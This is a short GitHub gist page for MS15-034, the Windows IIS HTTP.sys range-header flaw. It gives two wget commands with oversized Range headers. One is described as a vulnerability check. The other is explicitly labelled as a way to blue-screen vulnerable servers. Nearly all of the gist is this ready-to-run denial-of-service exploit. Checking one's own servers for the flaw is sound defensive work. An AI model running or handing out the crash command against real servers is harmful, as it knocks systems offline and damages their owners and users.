Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save bongbongco/18af825ead4f37d8e369d5358700005d to your computer and use it in GitHub Desktop.
Save bongbongco/18af825ead4f37d8e369d5358700005d to your computer and use it in GitHub Desktop.
Test for MS15-034 with WGET
#Use this just to test (Requested Range Not Satisfiable = vulnerable):
wget --header="Range: bytes=0-18446744073709551615" http://serveraddress/iis-85.png
#Use this to BSOD Vulnerable systems:
wget --header="Range: bytes=18-18446744073709551615" http://serveraddress/iis-85.png
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment